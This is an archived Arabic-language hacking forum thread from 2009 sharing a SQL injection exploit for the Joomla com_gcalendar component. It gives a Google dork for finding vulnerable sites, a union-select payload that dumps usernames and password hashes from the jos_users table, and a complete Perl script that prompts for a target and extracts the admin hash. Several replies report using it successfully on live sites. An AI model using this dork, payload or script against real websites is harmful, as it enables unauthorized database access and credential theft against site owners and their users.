:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات (http://www.vbspiders.com/vb/f38.html)
-   -   ثغره جوملا (http://www.vbspiders.com/vb/t22414.html)

pal.devil 11-28-2009 08:39 PM

ثغره جوملا
 
ثغره جديده الله اعلم


http://www.exploit-db.com/exploits/10232


يا ريت من اصحاااب الخبره توضيحهاا ...لانو الكثير من المواقع المصابه (جوملا)



p7d@hotmail.de

KaLa$nikoV 11-28-2009 09:24 PM

اقتباس:

Vulnerable: Remote SQL Injection
Google Dork: inurl:"com_gcalendar"

البحث بجوجل ابحث عن الكلمه

inurl:"com_gcalendar"

نوع الثغره sql


الاستغلال

اقتباس:

Exploit
*******

-9999+union+select+0,concat(username,0x3a,password) ,2,3,4+from+jos_users--



الاستغالا مضاف كامل
سكربت بلغه برل للتطبيق
تشغيله من الدوز
تحتاج لبرنامج اكتف برل
الاستغلال اعلى يغني عنه

اقتباس:

#!/usr/bin/perl -w

#Joomla com_gcalendar (gcid) Sql injection
#Coded by v3n0m
#Gre4tz: All Yogyacarderlink Crew
#Special Gre4tz: Google

print "|----------------------------------------------------|\n";
print "| YOGYACARDERLINK 'com_gcalendar Remote Injector' |\n";
print "| Coded by : v3n0m |\n";
print "| Greetz : LeQhi (bug founder) |\n";
print "| sHoutz : Yogyacarderlink Crew |\n";
print "| |\n";
print "| -v3n0m & lingah paling ganteng se-jogjakarta- |\n";
print "| |\n";
print "| www.yogyacarderlink.web.id |\n";
print "|----------------------------------------------------|\n";
use LWP::UserAgent;
print "\nMasukin Target:[http://wwww.target.com/path/]: ";
chomp(my $target=<STDIN>);
#Nama Column
$kontol="group_concat(username,0x3a,password)";
#Nama Table
$memek="jos_users";
$ngentot="-9999+union+select+";
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target . "index.php?option=com_gcalendar&view=event&eventID =peler&start=memek&end=kentu&gcid=".$ngentot."0,". $kontol.",2,3,4+from/**/".$memek."+--+";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->*******; if ($answer =~/([0-9a-fA-F]{32})/){
print "\n[+] Admin Hash : $1\n\n";
print "Sukses coy !! Wah selamat yee bro...\n";
print "Coba langsung dicheck ke TKP aja bro biar lebih yakin...\n";
print "\n";
print "Attention:\n";
print "v3n0m & lingah emang paling ganteng...\n";
print "Yang kaga setuju/protes = GAY !!\n";
print "\n";
}
else{print "\n[-] wah gagal bro (Belom Cebok tangan lo)...\n";
}

بالتوفيق

the cold zero 11-29-2009 12:45 AM

مشكور اخ فولكانو على التوضيح

AkKiRa-HaCkEr 11-30-2009 04:25 AM

شباب ممكن كيفية استغلال هذه الثغرة
و الله ما فهمت شيء
يعني هذه الثغرة صعبة شوية

Bexdor 11-30-2009 01:26 PM

شكراً لك اخي الكريم على الثغرة
مواقع كثيرة مصابة
لكن تطلع الباس مشفر MD5
وفي الصورة تطبيق لي على الثغرة

http://img16.imageshack.us/img16/1441/dsdsdse.gif




اقتباس:

المشاركة الأصلية كتبت بواسطة AkKiRa-HaCkEr (المشاركة 81558)
شباب ممكن كيفية استغلال هذه الثغرة
و الله ما فهمت شيء
يعني هذه الثغرة صعبة شوية


الثغرة اخي سهلة تطبيقها راجع الرد الثاني في الموضوع
تحياتى اليك

CrZ x u2u3 12-05-2009 10:48 PM

تم طبيق بنجاح


شكررا لك اخوي

mr saw 12-10-2009 10:12 PM

التغرة خآصة بإصدآر قديمة شوية :s
عـ،ـــــــــــــلى العمـ،ـوم تسـلم على الجهود || تقبل تحيآت ، أخوك، Mr saW

KaLa$nikoV 12-11-2009 03:25 PM

هلا مستر سو اتشرفنا بوجودك :)

DR-HEX 12-11-2009 03:28 PM

مشكور اخ فولكانو على التوضيح


الساعة الآن 07:14 PM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0